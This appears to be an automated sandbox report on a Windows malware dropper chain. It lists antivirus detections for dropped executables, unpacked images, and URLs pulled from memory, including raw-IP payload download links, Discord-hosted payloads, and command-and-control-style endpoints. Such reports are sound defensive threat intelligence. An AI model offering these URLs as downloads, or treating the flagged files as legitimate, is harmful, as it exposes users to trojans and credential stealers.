C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\searchEUunlim[1].exe	100%	Avira	TR/AD.MalwareCrypter.lssyq
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\f[1].exe	100%	Avira	TR/Redcap.loame
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.txt	100%	Avira	HEUR/AGEN.1144071
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.txt	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_7.txt	100%	Avira	TR/Dldr.Agent.ahsja
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.txt	100%	Avira	HEUR/AGEN.1142187
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\search_target1kpd[1].exe	100%	Avira	TR/AD.MalwareCrypter.zmiqj
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.txt	100%	Avira	HEUR/AGEN.1144344
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.txt	100%	Avira	HEUR/AGEN.1202313
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_8.txt	100%	Avira	HEUR/AGEN.1144344
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe	100%	Avira	TR/Agent.grsnc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr758214[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.txt	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr943210[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\searchEUunlim[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\f[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\file4[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\appforpr2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.txt	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\file3[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.txt	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\ferrari[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_8.txt	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\setup[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\f[1].exe	23%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\f[1].exe	82%	ReversingLabs	Win32.Trojan.AgentAGen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr758214[1].exe	38%	ReversingLabs	ByteCode-MSIL.Infostealer.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\appforpr2[1].exe	43%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\appforpr2[1].exe	89%	ReversingLabs	Win32.Trojan.Azorult
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\file3[1].exe	24%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\file3[1].exe	64%	ReversingLabs	Win32.Trojan.CrypterX

Unpacked PE Files

Source	Detection	Scanner	Label	Download
11.0.arnatic_1.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1144071	Download File
15.2.arnatic_3.exe.23e0e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
17.0.arnatic_4.exe.d30000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
15.0.arnatic_3.exe.23e0e50.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
15.0.arnatic_3.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1143724	Download File
19.2.arnatic_5.exe.e20000.0.unpack	100%	Avira	HEUR/AGEN.1202313	Download File
13.3.arnatic_2.exe.9d0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.3.arnatic_3.exe.2480000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
15.0.arnatic_3.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1144344	Download File
19.0.arnatic_5.exe.e20000.0.unpack	100%	Avira	HEUR/AGEN.1202313	Download File
15.0.arnatic_3.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1143724	Download File
15.0.arnatic_3.exe.23e0e50.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
13.0.arnatic_2.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1144344	Download File
15.2.arnatic_3.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1143724	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://45.144.225.57/EU/searchEUunlim.exe	100%	Avira URL Cloud	malware
http://212.193.30.29/WW/file3.exemf	100%	Avira URL Cloud	malware
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exeI	0%	Avira URL Cloud	safe
http://212.193.30.29/WW/file3.exeme	100%	Avira URL Cloud	malware
http://212.193.30.29/WW/file1.exeC:	100%	Avira URL Cloud	malware
http://xmtbsj.com/setup.exe	100%	Avira URL Cloud	malware
http://212.193.30.45/WW/file8.exeC:	100%	Avira URL Cloud	malware
http://45.144.225.57/WW/search_target1kpd.exe/sfx_123_310.exe8	100%	Avira URL Cloud	malware
http://212.193.30.45/WW/file8.exe%d3	100%	Avira URL Cloud	malware
http://45.144.225.57/WW/search_target1kpd.exemp	100%	Avira URL Cloud	malware
http://joinarts.top/check.php?publisher=ww2&	0%	Avira URL Cloud	safe
http://wfsdragon.ru/api/setStats.php	0%	Avira URL Cloud	safe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exeg	0%	Avira URL Cloud	safe
https://iplis.ru:443/1G8Fx7.mp3tData.phpr	100%	Avira URL Cloud	malware
http://212.193.30.45/WW/file8.exe	100%	Avira URL Cloud	malware
http://tg8.cllgxx.com/sr21/siww1047.exev	0%	Avira URL Cloud	safe
http://45.144.225.57/WW/sfx_123_310.exeKd	100%	Avira URL Cloud	malware
http://stylesheet.faseaegasdfase.com/hp8/g1/rtst1053.exe	100%	Avira URL Cloud	malware
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exe	0%	Avira URL Cloud	safe
http://212.193.30.29/WW/file1.exeL	100%	Avira URL Cloud	malware
http://212.193.30.45/WW/file10.exe1d/	100%	Avira URL Cloud	malware
http://212.193.30.29/WW/file3.exet	100%	Avira URL Cloud	malware
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exeC:	0%	Avira URL Cloud	safe
http://45.144.225.57/WW/search_target1kpd.exevw9	100%	Avira URL Cloud	malware
http://212.193.30.29/WW/file1.exe	100%	Avira URL Cloud	malware
http://45.144.225.57/EU/searchEUunlim.exem	100%	Avira URL Cloud	malware
http://212.193.30.45/WW/file8.exeL	100%	Avira URL Cloud	malware
http://212.193.30.45/WW/file8.exeM	100%	Avira URL Cloud	malware
http://tg8.cllgxx.com/sr21/siww1047.exe	0%	Avira URL Cloud	safe
http://2.56.59.42:80/base/api/getData.php	100%	Avira URL Cloud	malware
http://212.193.30.45/WW/file7.exeC:	100%	Avira URL Cloud	malware
http://212.193.30.29/WW/file3.exen	100%	Avira URL Cloud	malware
http://45.144.225.57/WW/search_target1kpd.exe	100%	Avira URL Cloud	malware
http://joinarts.top/check.php?publisher=ww2C:	0%	Avira URL Cloud	safe
http://2.56.59.42/base/api/getData.php	100%	Avira URL Cloud	malware
http://212.193.30.29/WW/file2.exe0.exeQd	100%	Avira URL Cloud	malware
https://ipgeolocation.io/Content-Type:	0%	Avira URL Cloud	safe
http://45.144.225.57/EU/searchEUunlim.exeC:	100%	Avira URL Cloud	malware
https://curl.se/V	0%	URL Reputation	safe
http://45.144.225.57/WW/search_target1kpd.exean	100%	Avira URL Cloud	malware
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exeI	0%	Avira URL Cloud	safe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exeJ	0%	Avira URL Cloud	safe
https://s.lletlee.com/tmp/aaa_v002.dllxxxxxxxxxxxxxxxxxxxH	0%	Avira URL Cloud	safe
http://212.193.30.45/WW/file9.exemZ	100%	Avira URL Cloud	malware
http://212.193.30.45/WW/file9.exe0	100%	Avira URL Cloud	malware
https://iplis.ru/	100%	Avira URL Cloud	malware
http://212.193.30.45/WW/file9.exe	100%	Avira URL Cloud	malware
http://212.193.30.29/WW/file2.exeC:	100%	Avira URL Cloud	malware
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exe	0%	Avira URL Cloud	safe
http://212.193.30.29/WW/file4.exe	100%	Avira URL Cloud	malware
http://motiwa.xyz/	0%	Avira URL Cloud	safe
https://watertecindia.com/watertec/f.exe	0%	Avira URL Cloud	safe
http://45.144.225.57/WW/sfx_123_310.exeW	100%	Avira URL Cloud	malware
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exeC:	0%	Avira URL Cloud	safe
http://212.193.30.45/WW/file9.exeF	100%	Avira URL Cloud	malware
http://stylesheet.faseaegasdfase.com/hp8/g1/rtst1053.exeC:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://45.144.225.57/EU/searchEUunlim.exe	arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405435576.0000000003F14000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://gcc.gnu.org/bugs/):	setup_install.exe, 00000007.00000003.295885776.0000000002710000.00000004.00000001.sdmp	false		high
http://212.193.30.29/WW/file3.exemf	arnatic_5.exe, 00000013.00000003.366115286.0000000006400000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exeI	arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://212.193.30.29/WW/file3.exeme	arnatic_5.exe, 00000013.00000003.366115286.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpM	arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp	false		high
http://212.193.30.29/WW/file1.exeC:	arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://xmtbsj.com/setup.exe	arnatic_5.exe, 00000013.00000003.381215822.0000000003F66000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389209367.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386699379.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456885585.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379380319.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.30.45/WW/file8.exeC:	arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://45.144.225.57/WW/search_target1kpd.exe/sfx_123_310.exe8	arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.30.45/WW/file8.exe%d3	arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://45.144.225.57/WW/search_target1kpd.exemp	arnatic_5.exe, 00000013.00000003.366822613.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367378477.00000000064F9000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://joinarts.top/check.php?publisher=ww2&	arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpY	arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp	false		high
http://wfsdragon.ru/api/setStats.php	arnatic_5.exe, 00000013.00000003.440924023.0000000000B36000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481412159.0000000000B36000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487584514.0000000000B36000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/910842184708792331/931494519592075284/27f_1401.bmpC:	arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com:80/attachments/910842184708792331/931210851506065438/new_v11.bmp	arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/928293476800532500/utube0501.bmpC:	arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpp	arnatic_5.exe, 00000013.00000003.429864201.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441257967.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432262657.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428067710.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435620835.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433191051.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445072716.00000000064C0000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/931474583054352464/newt.bmp=	arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpq	arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp	false		high
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exeg	arnatic_5.exe, 00000013.00000003.427047961.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389209367.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443791496.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.409965913.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404326584.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393435775.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422152570.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386699379.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390959002.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432699630.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443329900.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417450531.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427504091.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422705718.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456966893.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432312491.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379380319.00000000064DA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/G	arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/931494519592075284/27f_1401.bmpMozilla/5.0	arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	false		high
https://sslamlssa1.tumblr.com/	arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000000.326086475.0000000003520000.00000004.00000001.sdmp	false		high
https://iplis.ru:443/1G8Fx7.mp3tData.phpr	arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.30.45/WW/file8.exe	arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
